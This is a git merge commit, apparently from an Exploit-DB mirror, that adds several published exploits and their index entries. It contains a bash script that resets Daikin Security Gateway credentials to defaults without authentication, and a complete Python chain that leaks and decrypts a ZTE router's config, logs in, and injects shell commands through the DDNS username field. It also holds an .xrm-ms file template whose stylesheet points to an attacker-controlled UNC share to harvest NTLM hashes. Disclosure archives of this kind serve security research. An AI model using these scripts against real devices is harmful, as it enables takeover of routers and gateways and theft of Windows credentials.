Merge remote-tracking branch 'exploitdb/main'

2025-05-03 00:02:49 +00:00 · 2025-05-03 00:02:49 +00:00 · 23961d7132
commit 23961d7132
parent 00de2ea641 5544e2e039
5 changed files with 502 additions and 0 deletions
--- a/exploits/multiple/local/52278.txt
+++ b/exploits/multiple/local/52278.txt
@ -0,0 +1,55 @@
 # Daikin Security Gateway 214 - Remote Password Reset
 # Vendor: Daikin Industries, Ltd.
 # Product web page: https://www.daikin.com
 # https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
 # Affected version: App: 100, Frm: 214
 #
 # Summary: The Security gateway allows the iTM and LC8 controllers
 # to connect through the Security gateway to the Daikin Cloud Service.
 # Instead of sending the report to the router directly, the iTM or
 # LC8 controller sends the report to the Security gateway first. The
 # Security gateway transforms the report format from http to https
 # and then sends the transformed https report to the Daikin Cloud
 # Service via the router. Built-in LAN adapter enabling online control.
 #
 # Desc: The Daikin Security Gateway exposes a critical vulnerability
 # in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
 # attacker can send a crafted POST request to this endpoint, bypassing
 # authentication mechanisms. Successful exploitation resets the system
 # credentials to the default Daikin:Daikin username and password combination.
 # This allows attackers to gain unauthorized access to the system without
 # prior credentials, potentially compromising connected devices and networks.
 #
 # Tested on: fasthttp
 #
 #
 # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
 #                             @zeroscience
 #
 #
 # Advisory ID: ZSL-2025-5931
 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
 #
 #
 # 21.03.2025
 #
 [ $# -ne 1 ] && { echo "Usage: $0 <target_ip>"; exit 1; }
 TARGET_IP="$1"
 URL="https://$TARGET_IP/api/settings/password/reset"
 PAYLOAD="t00t"
 [[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] && { echo "Bad IP."; exit 1; }
 RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2>/dev/null)
 [ $? -ne 0 ] && { echo "Can’t reach $TARGET_IP."; exit 1; }
 if [[ $RESPONSE =~ \"Error\":0 ]]; then
  echo "Reset worked! Vulnerable."
 elif [[ $RESPONSE =~ \"Error\":1 ]]; then
  echo "Not vulnerable."
 else
  echo "Got: $RESPONSE"
 fi
--- a/exploits/multiple/local/52279.py
+++ b/exploits/multiple/local/52279.py
@ -0,0 +1,303 @@
 # Exploit Title: ZTE ZXV10 H201L - RCE via authentication bypass
 # Exploit Author:  l34n (tasos meletlidis)
 # https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
 import http.client, requests, os, argparse, struct, zlib
 from io import BytesIO
 from os import stat
 from Crypto.Cipher import AES
 def login(session, host, port, username, password):
    login_token = session.get(f"http://{host}:{port}/").text.split("getObj(\"Frm_Logintoken\").value = \"")[1].split("\"")[0]
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = {
        "Username": username,
        "Password": password,
        "frashnum": "",
        "Frm_Logintoken": login_token
    }
    session.post(f"http://{host}:{port}/", headers=headers, data=data)
 def logout(session, host, port):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = {
        "logout": "1",
    }
    session.post(f"http://{host}:{port}/", headers=headers, data=data)
 def leak_config(host, port):
    conn = http.client.HTTPConnection(host, port)
    boundary = "----WebKitFormBoundarysQuwz2s3PjXAakFJ"
    body = (
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="config"\r\n'
        "\r\n"
        "\r\n"
        f"--{boundary}--\r\n"
    )
    headers = {
        "Content-Type": f"multipart/form-data; boundary={boundary}",
        "Content-Length": str(len(body)),
        "Connection": "close",
    }
    conn.request("POST", "/getpage.gch?pid=101", body, headers)
    response = conn.getresponse()
    response_data = response.read()
    with open("config.bin", "wb") as file:
        file.write(response_data)
    conn.close()
 def _read_exactly(fd, size, desc="data"):
    chunk = fd.read(size)
    if len(chunk) != size:
        return None
    return chunk
 def _read_struct(fd, fmt, desc="struct"):
    size = struct.calcsize(fmt)
    data = _read_exactly(fd, size, desc)
    if data is None:
        return None
    return struct.unpack(fmt, data)
 def read_aes_data(fd_in, key):
    encrypted_data = b""
    while True:
        aes_hdr = _read_struct(fd_in, ">3I", desc="AES chunk header")
        if aes_hdr is None:
            return None
        _, chunk_len, marker = aes_hdr
        chunk = _read_exactly(fd_in, chunk_len, desc="AES chunk data")
        if chunk is None:
            return None
        encrypted_data += chunk
        if marker == 0:
            break
    cipher = AES.new(key.ljust(16, b"\0")[:16], AES.MODE_ECB)
    fd_out = BytesIO()
    fd_out.write(cipher.decrypt(encrypted_data))
    fd_out.seek(0)
    return fd_out
 def read_compressed_data(fd_in, enc_header):
    hdr_crc = zlib.crc32(struct.pack(">6I", *enc_header[:6]))
    if enc_header[6] != hdr_crc:
        return None
    total_crc = 0
    fd_out = BytesIO()
    while True:
        comp_hdr = _read_struct(fd_in, ">3I", desc="compression chunk header")
        if comp_hdr is None:
            return None
        uncompr_len, compr_len, marker = comp_hdr
        chunk = _read_exactly(fd_in, compr_len, desc="compression chunk data")
        if chunk is None:
            return None
        total_crc = zlib.crc32(chunk, total_crc)
        uncompressed = zlib.decompress(chunk)
        if len(uncompressed) != uncompr_len:
            return None
        fd_out.write(uncompressed)
        if marker == 0:
            break
    if enc_header[5] != total_crc:
        return None
    fd_out.seek(0)
    return fd_out
 def read_config(fd_in, fd_out, key):
    ver_header_1 = _read_struct(fd_in, ">5I", desc="1st version header")
    if ver_header_1 is None:
        return
    ver_header_2_offset = 0x14 + ver_header_1[4]
    fd_in.seek(ver_header_2_offset)
    ver_header_2 = _read_struct(fd_in, ">11I", desc="2nd version header")
    if ver_header_2 is None:
        return
    ver_header_3_offset = ver_header_2[10]
    fd_in.seek(ver_header_3_offset)
    ver_header_3 = _read_struct(fd_in, ">2H5I", desc="3rd version header")
    if ver_header_3 is None:
        return
    signed_cfg_size = ver_header_3[3]
    file_size = stat(fd_in.name).st_size
    fd_in.seek(0x80)
    sign_header = _read_struct(fd_in, ">3I", desc="signature header")
    if sign_header is None:
        return
    if sign_header[0] != 0x04030201:
        return
    sign_length = sign_header[2]
    signature = _read_exactly(fd_in, sign_length, desc="signature")
    if signature is None:
        return
    enc_header_raw = _read_exactly(fd_in, 0x3C, desc="encryption header")
    if enc_header_raw is None:
        return
    encryption_header = struct.unpack(">15I", enc_header_raw)
    if encryption_header[0] != 0x01020304:
        return
    enc_type = encryption_header[1]
    if enc_type in (1, 2):
        if not key:
            return
        fd_in = read_aes_data(fd_in, key)
        if fd_in is None:
            return
    if enc_type == 2:
        enc_header_raw = _read_exactly(fd_in, 0x3C, desc="second encryption header")
        if enc_header_raw is None:
            return
        encryption_header = struct.unpack(">15I", enc_header_raw)
        if encryption_header[0] != 0x01020304:
            return
        enc_type = 0
    if enc_type == 0:
        fd_in = read_compressed_data(fd_in, encryption_header)
        if fd_in is None:
            return
    fd_out.write(fd_in.read())
 def decrypt_config(config_key):
    encrypted = open("config.bin", "rb")
    decrypted = open("decrypted.xml", "wb")
    read_config(encrypted, decrypted, config_key)
    with open("decrypted.xml", "r") as file:
        contents = file.read()
        username = contents.split("IGD.AU2")[1].split("User")[1].split("val=\"")[1].split("\"")[0]
        password = contents.split("IGD.AU2")[1].split("Pass")[1].split("val=\"")[1].split("\"")[0]
    encrypted.close()
    os.system("rm config.bin")
    decrypted.close()
    os.system("rm decrypted.xml")
    return username, password
 def command_injection(cmd):
    injection = f"user;{cmd};echo "
    injection = injection.replace(" ", "${IFS}")
    return injection
 def set_ddns(session, host, port, payload):
    headers = {
        "Content-Type": "application/x-www-form-urlencoded"
    }
    data = {
        "IF_ACTION": "apply",
        "IF_ERRORSTR": "SUCC",
        "IF_ERRORPARAM": "SUCC",
        "IF_ERRORTYPE": -1,
        "IF_INDEX": None,
        "IFservice_INDEX": 0,
        "IF_NAME": None,
        "Name": "dyndns",
        "Server": "http://www.dyndns.com/",
        "ServerPort": None,
        "Request": None,
        "UpdateInterval": None,
        "RetryInterval": None,
        "MaxRetries": None,
        "Name0": "dyndns",
        "Server0": "http://www.dyndns.com/",
        "ServerPort0": 80,
        "Request0": "",
        "UpdateInterval0": 86400,
        "RetryInterval0": 60,
        "MaxRetries0": 3,
        "Name1": "No-IP",
        "Server1": "http://www.noip.com/",
        "ServerPort1": 80,
        "Request1": "",
        "UpdateInterval1": 86400,
        "RetryInterval1": 60,
        "MaxRetries1": 3,
        "Name2": "easyDNS",
        "Server2": "https://web.easydns.com/",
        "ServerPort2": 80,
        "Request2": "",
        "UpdateInterval2": 86400,
        "RetryInterval2": 180,
        "MaxRetries2": 5,
        "Enable": 1,
        "Hidden": None,
        "Status": None,
        "LastError": None,
        "Interface": "IGD.WD1.WCD3.WCIP1",
        "DomainName": "hostname",
        "Service": "dyndns",
        "Username": payload,
        "Password": "password",
        "Offline": None,
        "HostNumber": ""
    }
    session.post(f"http://{host}:{port}/getpage.gch?pid=1002&nextpage=app_ddns_conf_t.gch", headers=headers, data=data)
 def pwn(config_key, host, port):
    session = requests.Session()
    leak_config(host, port)
    username, password = decrypt_config(config_key)
    login(session, host, port, username, password)
    shellcode = "echo hacked>/var/tmp/pwned"
    payload = command_injection(shellcode)
    set_ddns(session, host, port, payload)
    logout(session, host, port)
    print("[+] PoC complete")
 def main():
    parser = argparse.ArgumentParser(description="Run remote command on ZTE ZXV10 H201L")
    parser.add_argument("--config_key", type=lambda x: x.encode(), default=b"Renjx%2$CjM", help="Leaked config encryption key from cspd")
    parser.add_argument("--host", required=True, help="Target IP address of the router")
    parser.add_argument("--port", required=True, type=int, help="Target port of the router")
    args = parser.parse_args()
    pwn(args.config_key, args.host, args.port)
 if __name__ == "__main__":
    main()
--- a/exploits/windows/local/52277.txt
+++ b/exploits/windows/local/52277.txt
@ -0,0 +1,104 @@
 # Exploit Author: John Page (aka hyp3rlinx)
 #  Website: hyp3rlinx.altervista.org
 #  Source:  https://hyp3rlinx.altervista.org/advisories/Microsoft_Windows_xrm-ms_File_NTLM-Hash_Disclosure.txt
 #  x.com/hyp3rlinx
 # ISR: ApparitionSec
 [Vendor]
 www.microsoft.com
 [Product]
 .xrm-ms File Type
 [Vulnerability Type]
 NTLM Hash Disclosure (Spoofing)
 [Video URL PoC]
 https://www.youtube.com/watch?v=d5U_krLQbNY
 [CVE Reference]
 N/A
 [Security Issue]
 The Windows XRM-MS file type is related to Microsofts software licensing infrastructure.
 C:\> assoc .xrm-ms=MSSppLicenseFile.
 An "xrm-ms" digital license file opens default (times a tickin) in Internet Explorer (MSIE) and on later OS versions switches to MS Edge.
 The ".xrm-ms" file format allows injecting XML stylesheets that will then get processed, when a user opens it.
 Adversaries can reference UNC paths for the stylesheet HREF tag that points to LAN network share or attacker controlled infrastructure.
 This results in an outbound connection to the attacker controlled network share and or server, leaking the target NTLM hash.
 Works from both a LAN network share perspective or remote forced drive-by download to a target etc. User interaction is required to open the file.
 During testing, xrm-ms file type not blocked by Windows Office Outlook client 2016 and a popular Email Gateway Security product as of few days ago.
 Xrm-Ms File points:
 1) XRM-MS is not considered dangerous file type
 2) Defaults to open in either MSIE or Edge Win7/10/11/Server 2019
 3) Default Icon as it is Windows browser may make it appear more "trust-worthy"
 4) Throws no errors from the stylesheet directive when processed
 5) May bypass some inbound email security inspections
 6) No MOTW roadblocks
 7) No active content security warnings
 Tested successfully in Win7/Win10/Server 2019
 Mileage may vary on Windows 11 and or recently updated systems.
 [Exploit/POC]
 Delivery options:
 Drive-by force download
 Email
 Network Share
 Archive .zip etc
 1) Create .xrm-ms File with following content, adjust attacker server information. Actually, all you need is the one XML stylesheet to trigger it.
 <?xml version="1.0" encoding="utf-8"?>
 <?xml-stylesheet href="\\ATTACKER-SERVER\NTLMhashLeakDontMeetMSRCBarPoC" ?>
 <r:license xmlns:r="http://www.microsoft.com/DRM/rightsManager">
  <r:licenseID>12345-67890-ABCDE</r:licenseID>
  <r:productName>Windows(R) Operating System, VOLUME_KMSCLIENT channel</r:productName>
  <r:productKeyID>XXXXX-XXXXX-XXXXX-XXXXX-XXXXX</r:productKeyID>
  <r:hardwareBinding>
    <r:hash>AA11BB22CC33DD44EE55</r:hash>
  </r:hardwareBinding>
  <r:validity>
    <r:validFrom>2024-01-01T00:00:00</r:validFrom>
    <r:validUntil>2025-01-01T00:00:00</r:validUntil>
  </r:validity>
  <r:signature>...</r:signature>
 </r:license>
 [Network Access]
 Remote
 [Severity]
 Medium
 [Disclosure Timeline]
 Vendor Notification:  April 17, 2025
 MSRC response: "report is a moderate spoofing and doesn't meet the bar." April 29, 2025
 April 30, 2025 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content copyright (c).
 hyp3rlinx
--- a/exploits/windows/local/52280.txt
+++ b/exploits/windows/local/52280.txt
@ -0,0 +1,36 @@
 # Exploit title: Microsoft - NTLM Hash Disclosure Spoofing (library-ms)
 # Exploit Author: John Page (aka hyp3rlinx)
 #  x.com/hyp3rlinx
 # ISR: ApparitionSec
 Back in 2018, I reported a ".library-ms" File NTLM information disclosure vulnerability to MSRC and was told "it was not severe enough", that being said I post it anyways.
 Seven years passed, until other researchers re-reported it.
 Subsequently this security flaw was finally deemed important by Microsoft and it received CVE-2025-24054, for which I was finally retroactively credited as the original reporter.
 Circa 2025 updated:
 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054
 [References]
 https://web.archive.org/web/20190106181024/https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.LIBRARY-MS-FILETYPE-INFORMATION-DISCLOSURE.txt
 https://packetstorm.news/files/id/148556/
 https://cxsecurity.com/issue/WLB-2018070160
 [Network Access]
 Remote
 [Original Disclosure Timeline]
 Vendor Notification:  Jun 29, 2018
 MSRC Response:   Jul 12, 2018  "risk is not severe enough to justify immediate servicing."
 July 14, 2018 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. All content copyright (c).
 hyp3rlinx
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -10453,6 +10453,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013
 7550,exploits/multiple/local/7550.c,"CUPS < 1.3.8-4 - Local Privilege Escalation",2008-12-22,"Jon Oberheide",local,multiple,,2008-12-21,2017-01-05,1,CVE-2008-5377;OSVDB-50637,,,,,
 52278,exploits/multiple/local/52278.txt,"Daikin Security Gateway  14 - Remote Password Reset",2025-05-01,LiquidWorm,local,multiple,,2025-05-01,2025-05-01,0,,,,,,
 47175,exploits/multiple/local/47175.sh,"Deepin Linux 15 - 'lastore-daemon' Local Privilege Escalation",2018-12-30,bcoles,local,multiple,,2019-07-26,2019-07-26,0,,,,,,https://github.com/bcoles/local-exploits/blob/93082cc81cf9998a2aea1a48f8ddb8fe01a74a66/lastore-daemon-root/lastore-daemon-root.sh
 19497,exploits/multiple/local/19497.c,"DIGITAL UNIX 4.0 d/e/f / AIX 4.3.2 / CDE 2.1 / IRIX 6.5.14 / Solaris 7.0 - Local Buffer Overflow",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2012-07-01,1,CVE-1999-0691;OSVDB-1071,,,,,https://www.securityfocus.com/bid/635/info
 11029,exploits/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,local,multiple,,2010-01-05,,0,,,,,,
@ -10604,6 +10605,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 9097,exploits/multiple/local/9097.txt,"xscreensaver 5.01 - Arbitrary File Disclosure Symlink",2009-07-09,kingcope,local,multiple,,2009-07-08,,1,OSVDB-55971,,,,,
 51470,exploits/multiple/local/51470.txt,"Yank Note v3.52.1 (Electron) - Arbitrary Code Execution",2023-05-23,8bitsec,local,multiple,,2023-05-23,2023-05-23,0,CVE-2023-31874,,,,,
 50504,exploits/multiple/local/50504.c,"zlog 1.2.15 - Buffer Overflow",2021-11-08,LIWEI,local,multiple,,2021-11-08,2021-11-08,0,,,,,http://www.exploit-db.comzlog-1.2.15.tar.gz,
 52279,exploits/multiple/local/52279.py,"ZTE ZXV10 H201L - RCE via authentication bypass",2025-05-01,"tasos meletlidis",local,multiple,,2025-05-01,2025-05-01,0,,,,,,
 32945,exploits/multiple/remote/32945.txt,"010 Editor 3.0.4 - File Parsing Multiple Buffer Overflow Vulnerabilities",2009-04-21,"Le Duc Anh",remote,multiple,,2009-04-21,2014-04-22,1,OSVDB-53926;OSVDB-53925,,,,,https://www.securityfocus.com/bid/34662/info
 24730,exploits/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",remote,multiple,,2004-11-10,2013-03-12,1,,,,,,https://www.securityfocus.com/bid/11652/info
 22497,exploits/multiple/remote/22497.txt,"12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure",2003-04-11,"Dennis Rand",remote,multiple,,2003-04-11,2012-11-05,1,OSVDB-50428,,,,,https://www.securityfocus.com/bid/7355/info
@ -40991,6 +40993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 17502,exploits/windows/local/17502.rb,"MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow (Metasploit)",2011-07-07,Metasploit,local,windows,,2011-07-07,2011-07-07,1,OSVDB-73627;CVE-2010-5299,"Metasploit Framework (MSF)",,,http://www.exploit-db.commicrop_0.1.1.1600.zip,
 14720,exploits/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Local Buffer Overflow",2010-08-23,"James Fitts",local,windows,,2010-08-23,2010-08-24,1,OSVDB-73627;CVE-2010-5299,,,http://www.exploit-db.com/screenshots/idlt15000/14720.png,http://www.exploit-db.commicrop_0.1.1.1600.zip,
 12213,exploits/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Local Privilege Escalation",2010-04-14,MJ0011,local,windows,,2010-04-13,,0,OSVDB-64951,,,,,
 52280,exploits/windows/local/52280.txt,"Microsoft - NTLM Hash Disclosure Spoofing (library-ms)",2025-05-01,hyp3rlinx,local,windows,,2025-05-01,2025-05-01,0,CVE-2025-24054,,,,,
 33892,exploits/windows/local/33892.rb,"Microsoft .NET Deployment Service - IE Sandbox Escape (MS14-009) (Metasploit)",2014-06-27,Metasploit,local,windows,,2014-06-27,2014-06-27,1,CVE-2014-0257;OSVDB-103163;MS14-009,"Metasploit Framework (MSF)",,,,
 14745,exploits/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",local,windows,,2010-08-25,2010-08-25,1,CVE-2010-3147;OSVDB-67553;CVE-2010-3143;OSVDB-67499,,,,,
 40859,exploits/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,local,windows,,2016-12-04,2016-12-04,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-12-04-at-205544.png,,
@ -41227,6 +41230,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40764,exploits/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",local,windows,,2016-11-15,2016-11-15,1,CVE-2016-7225;MS16-138,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=915
 49179,exploits/windows/local/49179.cpp,"Microsoft Windows - Win32k Elevation of Privilege",2020-12-02,nu11secur1ty,local,windows,,2020-12-02,2020-12-02,0,,,,,,
 46098,exploits/windows/local/46098.txt,"Microsoft Windows - Windows Error Reporting Local Privilege Escalation",2019-01-02,SandboxEscaper,local,windows,,2019-01-09,2019-01-09,0,,,,,,https://github.com/SandboxEscaper/randomrepo/blob/d3dbac51bf084c19064bb0f27fbcc800f2e6fe56/angrypolarbearbug.rar
 52277,exploits/windows/local/52277.txt,"Microsoft Windows - XRM-MS File NTLM Information Disclosure Spoofing",2025-05-01,hyp3rlinx,local,windows,,2025-05-01,2025-05-01,0,,,,,,
 47838,exploits/windows/local/47838.txt,"Microsoft Windows .Group File - Code Execution",2020-01-01,hyp3rlinx,local,windows,,2020-01-01,2020-02-07,1,,,,,,
 50653,exploits/windows/local/50653.txt,"Microsoft Windows .Reg File - Dialog Spoof / Mitigation Bypass",2022-01-12,hyp3rlinx,local,windows,,2022-01-12,2022-01-12,0,,,,,,
 46916,exploits/windows/local/46916.txt,"Microsoft Windows 10 (17763.379) - Install DLL",2019-05-23,SandboxEscaper,local,windows,,2019-05-23,2019-05-23,0,,,,,,https://github.com/SandboxEscaper/polarbearrepo/tree/763b757ead0ee8043a7edb5fdc2d437ae0f7b009/InstallerBypass